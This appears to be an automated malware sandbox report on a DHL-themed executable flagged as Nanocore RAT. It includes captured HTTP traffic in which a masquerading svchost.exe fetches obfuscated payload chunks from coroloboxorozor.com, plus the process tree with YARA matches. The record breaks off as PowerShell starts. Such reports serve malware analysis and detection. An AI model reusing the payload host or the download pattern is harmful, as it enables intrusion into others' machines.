                                                                                                                                        Data Raw: 36 66 63 31 0d 0a 3c 70 3e 44 44 65 58 78 65 61 49 49 65 78 65 4d 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 6b 69 69 65 6b 69 69 65 78 65 78 65 61 53 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 72 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 78 65 78 65 61 49 65 4d 61 65 61 53 72 65 61 49 65 78 65 61 53 78 65 58 65 6b 78 69 65 4d 4d 65 61 53 49 65 61 65 44 72 65 6b 78 69 65 4d 4d 65 53 49 65 61 78 49 65 61 78 69 65 61 61 69 65 4d 6b 65 61 61 6b 65 61 61 49 65 61 61 61 65 61 78 4d 65 61 61 49 65 58 44 65 61 78 58 65 4d 6b 65 58 58 65 58 44 65 61 61 78 65 61 61 78 65 61 61 61 65 61 61 72 65 4d 6b 65 58 53 65 61 78 61 65 4d 6b 65 61 61 49 65 61 61 44 65 61 61 78 65 4d 6b 65 61 78 69 65 61 61 78 65 4d 6b 65 72 53 65 44 58 65 53 4d 65 4d 6b 65 61 78 58 65 61 61 61 65 61 78 78 65 61 78 61 65 49 72 65 61 4d 65 61 4d 65 61 78 65 4d 72 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 53 78 65 72 58 65 78 65 78 65 44 72 65 61 65 4d 65 78 65 44 72 65 61 49 6b 65 49 61 65 61 53 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 6b 6b 49 65 78 65 4d 49 65 78 65 61 61 65 61 65 53 78 65 78 65 78 65 61 49 49 65 61 78 65 78 65 78 65 72 65 78 65 78 65 78 65 78 65 78 65 78 65 72 6b 65 61 44 49
                                                                                                                                        Data Ascii: 6fc1<p>DDeXxeaIIexeMexexexeIexexexekiiekiiexexeaSIexexexexexexexerIexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexeakSexexexeaIeMaeaSreaIexeaSxeXekxieMMeaSIeaeDrekxieMMeSIeaxIeaxieaaieMkeaakeaaIeaaaeaxMeaaIeXDeaxXeMkeXXeXDeaaxeaaxeaaaeaareMkeXSeaxaeMkeaaIeaaDeaaxeMkeaxieaaxeMkerSeDXeSMeMkeaxXeaaaeaxxeaxaeIreaMeaMeaxeMrexexexexexexexeSxerXexexeDreaeMexeDreaIkeIaeaSxexexexexexexexexekkIexeMIexeaaeaeSxexexeaIIeaxexexerexexexexexexerkeaDI
                                                                                                                                        Feb 25, 2021 11:05:05.345623016 CET4763OUTGET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 11:05:05.424154997 CET4765INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:05:05 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d03a5b5e8bdad23c56c9731fce4d3ba371614247505; expires=Sat, 27-Mar-21 10:05:05 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:30 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3f45e80000c7818507f000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=esCg3Zpi7nwA7nI9EFrSS8TBXO7Dzze%2FYfpZLDhxVXjnbkt6JH2UpgSbjZr1gK5kh4Ob%2Fz5rQEOWE0yjjK4OlbPUVFo5okrudpY4U1yZMNfehU0L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62709b1cadcdc781-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 37 63 38 33 0d 0a 3c 70 3e 6b 44 65 4d 4d 65 61 6b 78 65 61 61 72 65 61 78 72 65 69 53 65 61 49 72 65 6b 61 61 65 61 53 61 65 58 53 65 61 6b 53 65 6b 61 78 65 44 44 65 61 6b 78 65 61 78 61 65 61 69 58 65 6b 49 4d 65 72 58 65 53 53 65 61 44 4d 65 6b 6b 58 65 61 61 4d 65 61 6b 58 65 61 44 65 6b 49 53 65 61 72 72 65 61 6b 61 65 49 69 65 6b 6b 4d 65 49 44 65 6b 65 4d 49 65 6b 61 72 65 6b 6b 53 65 44 72 65 6b 61 4d 65 61 53 65 6b 69 65 61 72 72 65 78 65 61 6b 49 65 61 61 49 65 6b 69 6b 65 61 78 65 61 49 72 65 53 49 65 61 53 72 65 49 65 61 53 61 65 49 58 65 61 58 44 65 61 69 53 65 61 4d 58 65 4d 44 65 61 6b 61 65 4d 53 65 4d 6b 65 6b 6b 53 65 61 6b 4d 65 6b 78 6b 65 4d 44 65 61 49 65 61 58 61 65 6b 4d 58 65 69 6b 65 6b 4d 49 65 49 65 58 53 65 44 6b 65 72 6b 65 61 53 69 65 61 61 72 65 6b 69 61 65 72 53 65 69 78 65 6b 4d 53 65 61 6b 72 65 4d 78 65 49 53 65 6b 49 72 65 61 72 6b 65 61 69 65 61 58 53 65 61 72 78 65 61 6b 6b 65 61 44 44 65 61 6b 78 65 58 44 65 6b 61 53 65 53 69 65 72 49 65 61 69 69 65 4d 58 65 61 78 65 61 53 49 65 78 65 61 4d 58 65 69 78 65 53 6b 65 61 78 61 65 61 53 4d 65 6b 49 58 65 61 61 72 65 61 69 6b 65 6b 6b 58 65 6b 58 65 61 69 4d 65 6b 49 65 61 72 49 65 61 58 65 61 4d 4d 65 72 53 65 61 49 49 65 6b 53 65 6b 4d 53 65 6b 49 49 65 6b 49 58 65 61 44 6b 65 4d 72 65 61 4d 53 65 61 6b 53 65 6b 49 61 65 61 44 49 65 61 72 44 65 4d 49 65 61 61 65 58 65 61 69
                                                                                                                                        Data Ascii: 7c83<p>kDeMMeakxeaareaxreiSeaIrekaaeaSaeXSeakSekaxeDDeakxeaxaeaiXekIMerXeSSeaDMekkXeaaMeakXeaDekISearreakaeIiekkMeIDekeMIekarekkSeDrekaMeaSekiearrexeakIeaaIekikeaxeaIreSIeaSreIeaSaeIXeaXDeaiSeaMXeMDeakaeMSeMkekkSeakMekxkeMDeaIeaXaekMXeikekMIeIeXSeDkerkeaSieaarekiaerSeixekMSeakreMxeISekIrearkeaieaXSearxeakkeaDDeakxeXDekaSeSierIeaiieMXeaxeaSIexeaMXeixeSkeaxaeaSMekIXeaareaikekkXekXeaiMekIearIeaXeaMMerSeaIIekSekMSekIIekIXeaDkeMreaMSeakSekIaeaDIearDeMIeaaeXeai
                                                                                                                                        Feb 25, 2021 11:05:16.460832119 CET10633OUTGET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 11:05:16.522572994 CET10634INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:05:16 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d2236a2842b7d9e2031c0f20247c11fd41614247516; expires=Sat, 27-Mar-21 10:05:16 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:31 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3f71510000c781971c5000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=w501l8QfYU%2ByEY5NpY9ibErhOZICp020uGVFrHqFjFViMDypXX4chlamX%2Bu3fIqke3uKGfFB5R7bdTPAki5nNLAnESrgzKQhDEwlmstkgxMk2Q1x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62709b6219e1c781-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 66 38 31 0d 0a 3c 70 3e 4d 58 65 61 72 78 65 4d 58 65 61 69 58 65 4d 58 65 61 72 69 65 4d 58 65 61 69 78 65 4d 58 65 61 72 58 65 4d 58 65 61 72 69 65 4d 58 65 61 65 61 61 65 49 58 65 78 65 49 53 65 78 65 49 53 65 78 65 69 61 65 78 65 69 61 65 78 65 78 65 49 4d 65 6b 49 53 65 61 58 53 65 61 72 65 61 58 58 65 6b 49 65 61 58 58 65 6b 61 69 65 61 58 53 65 6b 61 4d 65 61 58 53 65 6b 4d 6b 65 61 58 53 65 72 65 61 58 58 65 6b 61 65 61 58 58 65 6b 49 69 65 61 58 53 65 58 65 61 58 58 65 61 58 65 61 58 58 65 72 65 61 58 58 65 6b 65 61 58 58 65 69 65 61 58 58 65 6b 6b 53 65 61 58 53 65 61 72 65 61 58 58 65 61 69 65 61 58 58 65 6b 61 65 61 58 58 65 72 65 61 58 58 65 6b 69 65 61 58 58 65 6b 61 65 61 58 58 65 61 65 61 61 65 69 4d 65 78 65 49 53 65 78 65 69 72 65 78 65 69 6b 65 78 65 69 44 65 78 65 78 65 4d 69 65 61 61 6b 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 6b 44 65 6b 61 61 65 61 4d 78 65 6b 61 61 65 61 61 78 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 6b 58 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 78 44 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 4d 58 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 69 61 65 6b 61 61 65 61 65 61 61 65 69 4d 65 78 65 69 6b 65 78 65 49 53 65 78 65 69 6b 65 78 65 69 49 65 78 65 78 65 49 61 65 61 44 58 65 4d 44 65 6b 78 53 65 4d 44 65 61 44 49 65 4d 44
                                                                                                                                        Data Ascii: f81<p>MXearxeMXeaiXeMXearieMXeaixeMXearXeMXearieMXeaeaaeIXexeISexeISexeiaexeiaexexeIMekISeaXSeareaXXekIeaXXekaieaXSekaMeaXSekMkeaXSereaXXekaeaXXekIieaXSeXeaXXeaXeaXXereaXXekeaXXeieaXXekkSeaXSeareaXXeaieaXXekaeaXXereaXXekieaXXekaeaXXeaeaaeiMexeISexeirexeikexeiDexexeMieaakekaaeaMaekaaeakDekaaeaMxekaaeaaxekaaeaIIekaaeaIaekaaeakXekaaeaMaekaaeaIiekaaeaIiekaaeaxDekaaeaMaekaaeaMXekaaeaIaekaaeaIIekaaeaiaekaaeaeaaeiMexeikexeISexeikexeiIexexeIaeaDXeMDekxSeMDeaDIeMD


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        2192.168.2.549731104.21.71.23080C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Feb 25, 2021 11:05:14.941435099 CET8506OUTGET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Feb 25, 2021 11:05:15.025151968 CET8507INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:05:15 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d78e6ba5e09293f45d8c04a8d59aa511b1614247514; expires=Sat, 27-Mar-21 10:05:14 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:27 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3f6b610000bd825fa5c000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YvZHwrwlVkZ0u2umGsyU44DyUJXVkq0Ow4O1Cvp%2BHpDJX%2FVwVKc5pn06ou%2Fb0ZZOPk%2BcdsWjDJHOBzqhezQJre%2B9dAGzNx5%2F5Fy2%2FwJND3gXP1t8"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62709b589efebd82-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 63 64 30 0d 0a 3c 70 3e 44 44 65 58 78 65 61 49 49 65 78 65 4d 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 6b 69 69 65 6b 69 69 65 78 65 78 65 61 53 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 72 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 78 65 78 65 61 49 65 4d 61 65 61 53 72 65 61 49 65 78 65 61 53 78 65 58 65 6b 78 69 65 4d 4d 65 61 53 49 65 61 65 44 72 65 6b 78 69 65 4d 4d 65 53 49 65 61 78 49 65 61 78 69 65 61 61 69 65 4d 6b 65 61 61 6b 65 61 61 49 65 61 61 61 65 61 78 4d 65 61 61 49 65 58 44 65 61 78 58 65 4d 6b 65 58 58 65 58 44 65 61 61 78 65 61 61 78 65 61 61 61 65 61 61 72 65 4d 6b 65 58 53 65 61 78 61 65 4d 6b 65 61 61 49 65 61 61 44 65 61 61 78 65 4d 6b 65 61 78 69 65 61 61 78 65 4d 6b 65 72 53 65 44 58 65 53 4d 65 4d 6b 65 61 78 58 65 61 61 61 65 61 78 78 65 61 78 61 65 49 72 65 61 4d 65 61 4d 65 61 78 65 4d 72 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 53 78 65 72 58 65 78 65 78 65 44 72 65 61 65 4d 65 78 65 44 72 65 61 49 6b 65 49 61 65 61 53 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 6b 6b 49 65 78 65 4d 49 65 78 65 61 61 65 61 65 53 78 65 78 65 78 65 61 49 49 65 61 78 65 78 65 78 65 72 65 78 65 78 65 78 65 78
                                                                                                                                        Data Ascii: cd0<p>DDeXxeaIIexeMexexexeIexexexekiiekiiexexeaSIexexexexexexexerIexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexeakSexexexeaIeMaeaSreaIexeaSxeXekxieMMeaSIeaeDrekxieMMeSIeaxIeaxieaaieMkeaakeaaIeaaaeaxMeaaIeXDeaxXeMkeXXeXDeaaxeaaxeaaaeaareMkeXSeaxaeMkeaaIeaaDeaaxeMkeaxieaaxeMkerSeDXeSMeMkeaxXeaaaeaxxeaxaeIreaMeaMeaxeMrexexexexexexexeSxerXexexeDreaeMexeDreaIkeIaeaSxexexexexexexexexekkIexeMIexeaaeaeSxexexeaIIeaxexexerexexexex
                                                                                                                                        Feb 25, 2021 11:05:15.458376884 CET9569OUTGET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 11:05:15.528357983 CET9570INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:05:15 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d86057839f042b7eab3d17a22424220fe1614247515; expires=Sat, 27-Mar-21 10:05:15 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:30 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3f6d660000bd82879a2000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2S%2BU7kDraL3Oaolk25tMk3EcjhdAUclq9ytOyzniUmRf3n%2BHBrgbiCzODHF4l2v9HotdJQAZQuLNbxcgME494ui2Jf1RAvwJa5%2BhQIRk88HPrmK5"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62709b5bd893bd82-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 39 31 33 0d 0a 3c 70 3e 6b 44 65 4d 4d 65 61 6b 78 65 61 61 72 65 61 78 72 65 69 53 65 61 49 72 65 6b 61 61 65 61 53 61 65 58 53 65 61 6b 53 65 6b 61 78 65 44 44 65 61 6b 78 65 61 78 61 65 61 69 58 65 6b 49 4d 65 72 58 65 53 53 65 61 44 4d 65 6b 6b 58 65 61 61 4d 65 61 6b 58 65 61 44 65 6b 49 53 65 61 72 72 65 61 6b 61 65 49 69 65 6b 6b 4d 65 49 44 65 6b 65 4d 49 65 6b 61 72 65 6b 6b 53 65 44 72 65 6b 61 4d 65 61 53 65 6b 69 65 61 72 72 65 78 65 61 6b 49 65 61 61 49 65 6b 69 6b 65 61 78 65 61 49 72 65 53 49 65 61 53 72 65 49 65 61 53 61 65 49 58 65 61 58 44 65 61 69 53 65 61 4d 58 65 4d 44 65 61 6b 61 65 4d 53 65 4d 6b 65 6b 6b 53 65 61 6b 4d 65 6b 78 6b 65 4d 44 65 61 49 65 61 58 61 65 6b 4d 58 65 69 6b 65 6b 4d 49 65 49 65 58 53 65 44 6b 65 72 6b 65 61 53 69 65 61 61 72 65 6b 69 61 65 72 53 65 69 78 65 6b 4d 53 65 61 6b 72 65 4d 78 65 49 53 65 6b 49 72 65 61 72 6b 65 61 69 65 61 58 53 65 61 72 78 65 61 6b 6b 65 61 44 44 65 61 6b 78 65 58 44 65 6b 61 53 65 53 69 65 72 49 65 61 69 69 65 4d 58 65 61 78 65 61 53 49 65 78 65 61 4d 58 65 69 78 65 53 6b 65 61 78 61 65 61 53 4d 65 6b 49 58 65 61 61 72 65 61 69 6b 65 6b 6b 58 65 6b 58 65 61 69 4d 65 6b 49 65 61 72 49 65 61 58 65 61 4d 4d 65 72 53 65 61 49 49 65 6b 53 65 6b 4d 53 65 6b 49 49 65 6b 49 58 65 61 44 6b 65 4d 72 65 61 4d 53 65 61 6b 53 65 6b 49 61 65 61 44 49 65 61 72 44 65 4d 49 65 61 61 65 58 65 61
                                                                                                                                        Data Ascii: 913<p>kDeMMeakxeaareaxreiSeaIrekaaeaSaeXSeakSekaxeDDeakxeaxaeaiXekIMerXeSSeaDMekkXeaaMeakXeaDekISearreakaeIiekkMeIDekeMIekarekkSeDrekaMeaSekiearrexeakIeaaIekikeaxeaIreSIeaSreIeaSaeIXeaXDeaiSeaMXeMDeakaeMSeMkekkSeakMekxkeMDeaIeaXaekMXeikekMIeIeXSeDkerkeaSieaarekiaerSeixekMSeakreMxeISekIrearkeaieaXSearxeakkeaDDeakxeXDekaSeSierIeaiieMXeaxeaSIexeaMXeixeSkeaxaeaSMekIXeaareaikekkXekXeaiMekIearIeaXeaMMerSeaIIekSekMSekIIekIXeaDkeMreaMSeakSekIaeaDIearDeMIeaaeXea
                                                                                                                                        Feb 25, 2021 11:05:42.977694035 CET13968OUTGET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 11:05:43.060276031 CET13970INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:05:43 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d32fa4bde8d2845333a55e5566c5da0b91614247543; expires=Sat, 27-Mar-21 10:05:43 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:31 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3fd8e70000bd8260084000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pNv2IARAHyIMnXz5%2BYalLkBB4lmtmqJW5HfLzk1dgOpRZBk3nKHaRIDe83tDq7%2FrZERY%2FpT8%2BoDS6MPnb1HwrcpYYLis0CIQqheaKc9dbquSNdsd"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62709c07ddf8bd82-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 34 37 62 66 0d 0a 3c 70 3e 4d 58 65 61 72 78 65 4d 58 65 61 69 58 65 4d 58 65 61 72 69 65 4d 58 65 61 69 78 65 4d 58 65 61 72 58 65 4d 58 65 61 72 69 65 4d 58 65 61 65 61 61 65 49 58 65 78 65 49 53 65 78 65 49 53 65 78 65 69 61 65 78 65 69 61 65 78 65 78 65 49 4d 65 6b 49 53 65 61 58 53 65 61 72 65 61 58 58 65 6b 49 65 61 58 58 65 6b 61 69 65 61 58 53 65 6b 61 4d 65 61 58 53 65 6b 4d 6b 65 61 58 53 65 72 65 61 58 58 65 6b 61 65 61 58 58 65 6b 49 69 65 61 58 53 65 58 65 61 58 58 65 61 58 65 61 58 58 65 72 65 61 58 58 65 6b 65 61 58 58 65 69 65 61 58 58 65 6b 6b 53 65 61 58 53 65 61 72 65 61 58 58 65 61 69 65 61 58 58 65 6b 61 65 61 58 58 65 72 65 61 58 58 65 6b 69 65 61 58 58 65 6b 61 65 61 58 58 65 61 65 61 61 65 69 4d 65 78 65 49 53 65 78 65 69 72 65 78 65 69 6b 65 78 65 69 44 65 78 65 78 65 4d 69 65 61 61 6b 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 6b 44 65 6b 61 61 65 61 4d 78 65 6b 61 61 65 61 61 78 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 6b 58 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 78 44 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 4d 58 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 69 61 65 6b 61 61 65 61 65 61 61 65 69 4d 65 78 65 69 6b 65 78 65 49 53 65 78 65 69 6b 65 78 65 69 49 65 78 65 78 65 49 61 65 61 44 58 65 4d 44 65 6b 78 53 65 4d 44 65 61
                                                                                                                                        Data Ascii: 47bf<p>MXearxeMXeaiXeMXearieMXeaixeMXearXeMXearieMXeaeaaeIXexeISexeISexeiaexeiaexexeIMekISeaXSeareaXXekIeaXXekaieaXSekaMeaXSekMkeaXSereaXXekaeaXXekIieaXSeXeaXXeaXeaXXereaXXekeaXXeieaXXekkSeaXSeareaXXeaieaXXekaeaXXereaXXekieaXXekaeaXXeaeaaeiMexeISexeirexeikexeiDexexeMieaakekaaeaMaekaaeakDekaaeaMxekaaeaaxekaaeaIIekaaeaIaekaaeakXekaaeaMaekaaeaIiekaaeaIiekaaeaxDekaaeaMaekaaeaMXekaaeaIaekaaeaIIekaaeaiaekaaeaeaaeiMexeikexeISexeikexeiIexexeIaeaDXeMDekxSeMDea


                                                                                                                                        Code Manipulations

                                                                                                                                        Statistics

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Start time:11:04:05
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Users\user\Desktop\DHL_document1102202068090891.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\Desktop\DHL_document1102202068090891.exe'
                                                                                                                                        Imagebase:0xef0000
                                                                                                                                        File size:61312 bytes
                                                                                                                                        MD5 hash:5E86EC60BC329DB96BE8D476537A554C
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                        Reputation:low

                                                                                                                                        General

                                                                                                                                        Start time:11:04:22
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:31
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:32
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:33
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:34
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):true
